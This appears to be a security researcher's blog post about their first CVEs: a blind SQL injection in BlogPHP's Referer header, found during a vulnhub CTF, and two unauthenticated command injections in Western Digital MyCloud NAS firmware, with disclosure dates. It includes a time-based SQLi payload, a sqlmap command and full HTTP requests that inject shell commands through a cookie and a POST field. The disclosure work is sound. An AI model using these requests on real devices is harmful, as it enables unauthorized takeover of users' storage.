My first CVE-2016-1000329 in BlogPHP

While the affected software, BlogPHP isn’t in widespread use (at least I hope not!) and it’s outdated and abandoned by the developer, this find means a lot to me because it’s my first CVE. This vulnerability has also been overlooked by many people for years, including those that worked on the Breach 2.1 vulnhub challenge. Breach 2.1 is a boot2root/CTF challenge which attempts to showcase a real-world scenario penetration test. My full write-up of my pentest of Breach can be found here.

I used a XSS exploit to steal the admin’s cookie which should have allowed me to login as admin but it didn’t work. Knowing that the admin user was logging in to a blog hosted on the same host I decided to take a look at the HTTP headers to see if I needed to change something in the “Referer” field in order for the stolen cookie to allow me to login as admin. I initially tried changing it to localhost and 127.0.0.1 with no success.

While fuzzing the HTTP header “Referer” field I discovered a blind SQL injection. Using an input of ‘+(select*from(select(sleep(20)))a)+’ including single quotes results in a delay of 20 seconds to page render. I was able to further exploit the vulnerability using sqlmap. I saved the request from Burp Suite to a text file and exploited it with sqlmap using “sqlmap -r req.txt –level=5 –risk=3”.

I submitted my CVE request through Mitre who notified me that “The Distributed Weakness Filing (DWF) Project is the CVE Numbering
Authority (CNA) currently responsible for assigning CVE IDs to open
source software vulnerabilities that are outside of the current CVE
coverage goals listed at
http://cve.mitre.org/cve/data_sources_product_coverage.html.”

CVE listing for CVE-2016-1000329 on DWF.

Command Injection vulnerability in Western Digital MyCloud NAS

The software version of my device is 2.11.142 and my device says that it’s up to date.

The first command injection vulnerability is in the home page URL, “/” in index.php Cookie. To detect successful exploitation I started Wireshark and watched for the pings sent to my IP address from the device.

The request:

GET / HTTP/1.1
Host: wdmycloudex2
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1

I deleted the PHPSESSID from the cookie and it still worked without any authentication.

The next one was in the /web/google_analytics.php URL.

POST /web/google_analytics.php HTTP/1.1
Host: wdmycloudex2
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://wdmycloudex2/
Content-Length: 52
Cookie: isAdmin=1; username=admin; username=admin; local_login=1; fw_version=2.11.142
Connection: close
cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23

I was also able to exploit this one unauthenticated on the LAN by deleting the PHPSESSID from the cookie and replaying the request from a different computer.

I submitted the vulnerabilities to Western Digital on 10/8/2016 and received word that they released a firmware update to remediate on 12/13/2016. These vulnerabilities have been submitted to Mitre for CVE assignment.

Update 1/3/2017: Mitre assigned CVE’s CVE-2016-10107 and CVE-2016-10108.

Update 1/10/2017: I received two new emails from Western Digital after the one they sent on 12/13/2016 telling me they released a firmware patch. They only patched 2016-10108.

On 12/29/2016:

On 1/9/2017: